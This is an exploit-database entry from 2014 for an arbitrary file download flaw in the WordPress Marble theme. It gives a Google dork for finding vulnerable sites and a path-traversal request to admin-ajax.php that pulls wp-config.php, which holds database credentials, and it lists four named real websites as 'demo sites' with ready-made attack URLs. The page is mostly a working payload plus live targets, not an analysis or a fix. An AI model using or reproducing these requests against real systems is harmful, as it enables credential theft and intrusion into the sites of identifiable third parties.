WordPress Theme Marble Arbitrary File Download Vulnerability

2014-09-17T00:00:00
ID 1337DAY-ID-22650
Type zdt
Reporter null_pointer
Modified 2014-09-17T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            Exploit Title : WordPress Theme Marble Arbitrary File Download Vulnerability

Exploit Author : NULL_Pointer

Date : 17/09/2014

Vendor Homepage : http://themeforest.net/item/marble-flat-responsive-creative-wordpress-theme/5896650

Version: 1.1.2

Google Dork : inurl:"/wp-content/themes/marble/"

Tested on : Linux, Windows 7

--------------------------------------------------------------

WordPress Theme Marble suffers from Arbitrary File Download Vulnerability.

Exploit : http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=[LFD]

Demo Sites :

http://caiomendes.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://www.agence3.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://cosmeticsurgerywv.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

http://prod-uct.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

#  0day.today [2018-04-02]  #